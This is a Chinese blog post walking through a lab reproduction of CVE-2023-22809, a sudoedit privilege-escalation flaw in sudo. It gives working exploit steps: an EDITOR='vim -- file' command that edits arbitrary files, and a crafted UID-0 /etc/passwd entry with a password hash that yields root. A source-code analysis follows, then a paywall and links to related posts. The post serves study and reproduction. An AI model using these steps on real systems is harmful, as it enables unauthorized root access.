【漏洞复现】CVE-2023-22809 sudo提权漏洞

最新推荐文章于 2024-09-16 07:19:50 发布
最新推荐文章于 2024-09-16 07:19:50 发布
阅读量1.4k 收藏 6
点赞数 2
文章标签: linux web安全 网络安全 安全威胁分析 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hack0919/article/details/130785934
版权
本文详细介绍了CVE-2023-22809 sudo编辑器漏洞,这是一个高危漏洞,允许本地攻击者通过sudoedit权限实现提权。漏洞影响sudo 1.8.0到1.9.12p1版本。文章涵盖环境搭建、漏洞检测、分析和提权方法,还提供了补丁信息。攻击者可以通过设置环境变量EDITOR为'vim -- file'来触发漏洞,编辑如/etc/passwd等敏感文件,从而达到提权目的。
摘要由CSDN通过智能技术生成

一、前言

  • 漏洞简介:Sudo中的sudoedit对处理用户提供的环境变量(如SUDO_EDITOR、VISUAL和EDITOR)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过sudoers策略的“–”参数时,拥有sudoedit访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升(由普通用户到超级用户,即"root")。
  • 漏洞编号:CVE-2023-22809
  • 漏洞等级:高危
  • 漏洞评分:7.8分
  • 影响版本:sudo 1.8.0-sudo 1.9.12p1(sudo>=1.8.0 or sudo <=1.9.12p1)
  • 攻击效果:本地提权

二、环境搭建

使用sudo --version查看当前系统下sudo版本

若在1.8.0-1.9.12p1范围内,则可以直接用本机环境复现,但是为了便于调试(获取符号信息)我们需要编译一份debug版本的sudo

首先到https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz下载固定版本的sudo,然后下载好后在压缩包对应目录下执行下列命令:

1

2

3

4

wget https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz

tar -zxvf ./sudo-1.9.12p1.tar.gz

cd sudo-1.9.12p1/

./configure && make && make install

编译成功后,我们调试的sudo程序就是有符号信息的了,编译后的sudo 位于/usr/local/bin文件夹内

调试过程可能会遇到sudo报错的问题,这个报错是由于gdb没有sudo模式下运行

然而如果直接sudo gdb,则又不会加载pwndbg插件

sudo命令不会加载个人配置文件(或者说继承当前的环境变量)而直接运行gdb,使用-E选项将当前环境变量传递给sudo命令就能成功加载pwndbg插件

1

2

sudo -E gdb /usr/local/bin/sudo

sudo -E gdb --args /usr/local/bin/sudo ...

三、漏洞检测

搭建好环境后,测试一下漏洞

首先创建/etc/test,然后编辑/etc/sudoers,在文件末尾添加(user为攻击者用户名)

1

user ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/test

这一步是为了满足攻击条件,具体原因会在下面分析提到

然后在命令行中输入

1

EDITOR='vim -- /path/to/file' sudoedit /etc/test

/path/to/file可以是任意文件,常见的提权有:修改/etc/shadow为空密码(但我本地未能成功,不清楚为啥)、修改/etc/passwd中root为用户名、修改/etc/sudoers规定用户X可以无密码执行任何操作,具体不再赘述

以修改/etc/shadow为例

先用openssl生成密码

1

2

x@x-virtual-machine:~$ openssl passwd -1 -salt xxx 123

$1$xxx$jTt7t9bGmhywOtQCjcQA.1

然后修改/etc/passwd,添加

1

xxx:$1$xxx$jTt7t9bGmhywOtQCjcQA.1:0:0:root:/root:/bin/bash

最后su xxx 然后输入密码123就可以提权了

完成提权

四、漏洞分析

先来看漏洞怎么走到触发位置的,首先关注main函数,sudo在main函数中进入parse_args函数解析sudo的启动参数,然后将返回值传入sudo_mode

1

2

3

4

5

6

7

8

9

10

11

12

13

int

main(int argc, char *argv[], char *envp[])

{

    int nargc, status = 0;

    char **nargv, **env_add;

    char **command_info = NULL, **argv_out = NULL, **run_envp = NULL;

    const char * const allowed_prognames[] = "sudo""sudoedit", NULL };

    ......

    submit_argv = argv;

    submit_envp = envp;

    sudo_mode = parse_args(argc, argv, &submit_optind, &nargc, &nargv,

        &sudo_settings, &env_add);

}

sudo_mode是parse_args的返回值,根据参数解析相应的模式,这个值决定下面的switch语句中进入哪个分支

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

int

parse_args(int argc, char **argv, int *old_optind, int *nargc, char ***nargv,

    struct sudo_settings **settingsp, char ***env_addp)

{

    const char *progname, *short_opts = sudo_short_opts;

    struct option *long_opts = sudo_long_opts;

    struct environment extra_env;

    int mode = 0;                /* what mode is sudo to be run in*/

    int flags = 0;                /* mode flags */

    int valid_flags = DEFAULT_VALID_FLAGS;

    int ch, i;

    char *cp;
最低0.47元/天 解锁文章
白袍万里
关注
【权限提升】Linux Sudo权限提升漏洞(CVE-2023-22809)
做自己喜欢的事,并将其发挥到极致!
04-05 8618
sudo 允许系统管理员将权限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。由于Sudo中的sudoedit对处理用户提供的环境变量(如SUDO_EDITOR、VISUAL和EDITOR)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过sudoers策略的 " –" 参数时,拥有sudoedit访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升。
CVE-2023-23752:Joomla未授权访问漏洞复现
薛定谔嘚喵博客
09-01 1663
Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。 在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。
CVE-2023-22809复现(Rot5pider安全团队)
weixin_52763014的博客
04-08 3061
复现过程中,遇到了编辑器的版本问题,vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数,但是换了一个环境的ubuntu下的vim8.1就可以执行,具体问题不是很清楚,可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名,第二是etc下的一个随意文件(这里具体哪些能行哪些不能行,我也不知道,我测试的vim和xml都可以执行,多试试)保存退出,然后 su xxx切换到用户中。
Linux sudo 提权漏洞 CVE-2021-3156 复现 附exp
god_Zeo的安全博客
02-04 1747
0x01 CVE-2021-3156: 缓冲区溢出漏洞sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。 0x02 影响版本 Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 不受影响版本 Sudo =>1.9.5p2 0x03 漏洞检测 测试环境:ubuntu:20.04 检测是否存在 s
CVE-2023-27997漏洞检测工具:高效、安全的FortiGate SSL VPN漏洞评估
最新发布
gitblog_00944的博客
09-16 1282
CVE-2023-27997漏洞检测工具:高效、安全的FortiGate SSL VPN漏洞评估 CVE-2023-27997-check Safely detect whether a FortiGate SSL VPN instance is vulnerable to CVE-2023-27997 based on...
sudo提权漏洞cve-2023-22809
m0_46317063的博客
06-06 675
cve-2023-22809
Linux Sudo权限提升漏洞复现(CVE-2023-22809)
MrCaia的博客
08-17 1008
CVE-2023-22809 Linux Sudo权限提升漏洞
Linux sudo权限提升漏洞CVE-2021-3156)复现
weixin_47531489的博客
07-20 433
1简介 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分。2 漏洞概述 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoer...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
sudo提权漏洞(CVE-2019-14287)
谢公子的博客
02-24 3025
目录 漏洞背景 漏洞影响版本 利用条件 漏洞复现 修复建议 漏洞背景 2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警。通过特定payload,用户可提升至root权限。 漏洞影响版本 sudo < 1.8.28 利用条件 sudo的版本号<1.8.28 知道当前用户的密码 当前用户存在于su...
CVE-202322809漏洞利用|复现
Musda的博客
06-22 752
首先需要检查sudoedit版本此漏洞的利用范围仅限于。
CVE-2021-3156 sudo命令提权漏洞复现
zhabgbuneng的博客
05-25 387
CVE-2021-3156 漏洞复现 0x00漏洞描述 这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。研究人员利用该漏洞在多个Linux发行版上成功获得了完整的
CVE-2023-22809 sudo安全漏洞修复解决
筑梦之路
03-30 700
下载最新版二进制包安装升级即可。
sudo堆缓冲区溢出提权漏洞CVE-2021-3156)
Ryan的博客
01-13 2867
sudo堆缓冲区溢出提权漏洞CVE-2021-3156)
漏洞复现Sudo缓存溢出提权漏洞CVE-2021-3156)
weixin_44647915的博客
04-22 6183
说明:此博客为本人的漏洞复现学习过程记录 前言 漏洞原理:本次的漏洞存在于Sudo上--一个基于堆的缓冲区溢出漏洞CVE-2021-3156,该漏洞被命名为“Baron Samedit”),在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击.
pyLoad远程代码执行漏洞复现(CVE-2023-0297)
0xSec
01-30 2965
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
GeoServer SQL 注入漏洞复现CVE-2023-25157)附poc
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
12-23 3905
GeoServer是OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。
java漏洞提权_sudo 提权漏洞CVE-2019-14287)复现
weixin_33512961的博客
02-13 214
(该文参考网络他人资料,仅为学习,不许用于非法用途)一、环境1、sudo版本小于1.8.28的Linux系统2、sudoLinux系统命令,让普通账号以root身份去执行某些命令,比如:安装软件、查看某些配置文件、关机、重启等操作、如果普通用户需要使用sudo,需要将修改配置文件/etc/sudoers,将sudo使用权赋予该账号sudo 提权漏洞是一个安全策略绕过问题,去执行某些敏感的命令,...
卡巴斯基揭示CVE-2023-28252 Windows越界写入漏洞
卡巴斯基披露了这个在野0day提权漏洞,它允许攻击者获取Windows中的system权限——Windows的最高用户权限级别。漏洞的利用方式是改变基础日志文件,迫使系统将基础日志文件中的假元素视为真实元素。攻击者可以通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值